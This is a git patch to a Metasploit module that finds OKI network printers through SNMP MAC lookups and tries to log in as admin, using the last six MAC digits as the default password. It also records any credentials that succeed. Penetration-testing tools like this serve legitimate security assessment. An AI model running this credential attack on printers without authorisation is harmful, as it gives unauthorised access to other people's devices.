From c2d59f0307cff09a76c48c278fc26b3aecc7834e Mon Sep 17 00:00:00 2001 From: sinn3r Date: Tue, 20 Dec 2011 11:32:33 -0600 Subject: [PATCH] Fix issue #6133 --- modules/auxiliary/scanner/misc/oki_scanner.rb | 57 ++++++++++--------- 1 file changed, 31 insertions(+), 26 deletions(-) diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index 25e1fc6e56..4399885b5b 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -10,15 +10,16 @@ require 'msf/core' class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient - include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Scanner def initialize(info={}) super(update_info(info, - 'Name' => 'OKI Scanner', + 'Name' => 'OKI Printer Scanner', 'Description' => %q{ Look for OKI printers on the network and try to connect to them as default - admin credentials + admin credentials. By default OKI network printers use the last six digits of + the MAC as admin password this addon will search for OKI printers on the network + and try to connect to them with the default password }, 'Author' => 'antr6X ', 'License' => MSF_LICENSE @@ -41,21 +42,20 @@ class Metasploit3 < Msf::Auxiliary @org_rport = datastore['RPORT'] datastore['RPORT'] = datastore['SNMPPORT'] - indexPage = "index_ad.htm" - authReqPage = "status_toc_ad.htm" + index_page = "index_ad.htm" + auth_req_page = "status_toc_ad.htm" snmp = connect_snmp() snmp.walk("1.3.6.1.2.1.2.2.1.6") do |mac| - lastSix = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase - firstSix = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase + last_six = mac.value.unpack("H2H2H2H2H2H2").join[-6,6].upcase + first_six = mac.value.unpack("H2H2H2H2H2H2").join[0,6].upcase #check if it is a OKI #OUI list can be found at http://standards.ieee.org/develop/regauth/oui/oui.txt - if firstSix == "002536" || firstSix == "008087" || firstSix == "002536" - print_status("") - sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s - print_status("Found #{sysName}") - print_status("Trying to access #{ip}/#{authReqPage} with username: admin and password: #{lastSix}") + if first_six == "002536" || first_six == "008087" || first_six == "002536" + sys_name = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s + print_status("Found: #{sys_name}") + print_status("Trying credential: admin/#{last_six}") tcp = Rex::Socket::Tcp.create( 'PeerHost' => rhost, @@ -67,24 +67,35 @@ class Metasploit3 < Msf::Auxiliary } ) - auth = Rex::Text.encode_base64("admin:#{lastSix}") - tcp.put("GET /#{authReqPage} HTTP/1.1\r\nReferer: http://#{ip}/#{indexPage}\r\nAuthorization: Basic #{auth}\r\n\r\n") + auth = Rex::Text.encode_base64("admin:#{last_six}") + + http_data = "GET /#{auth_req_page} HTTP/1.1\r\n" + http_data << "Referer: http://#{ip}/#{index_page}\r\n" + http_data << "Authorization: Basic #{auth}\r\n\r\n" + + tcp.put(http_data) data = tcp.recv(12) responce = "#{data[9..11]}" case responce when "200" - message = "**Default credentials works** :)" + print_good("#{rhost}:#{datastore['HTTPPORT']} logged in as: admin/#{last_six}") + report_auth_info( + :host => rhost, + :port => datastore['HTTPPORT'], + :proto => "tcp", + :user => 'admin', + :pass => last_six + ) when "401" - message = "Default credentials failed :(" + print_error("Default credentials failed") when "404" - message = "Page not found, try credentials manually. user: admin pass: #{lastSix}" + print_status("Page not found, try credential manually: admin/{last_six}") else - message = "Unexpected message" + print_status("Unexpected message") end - print_status("#{message}\n") disconnect() end end @@ -98,10 +109,4 @@ class Metasploit3 < Msf::Auxiliary rescue ::Exception => e print_status("Unknown error: #{e.class} #{e}") end -end - -=begin -by default OKI network printers use the last six digits of the MAC as admin password -this addon will search for OKI printers on the network and try to connect to them with -the default password -=end \ No newline at end of file +end \ No newline at end of file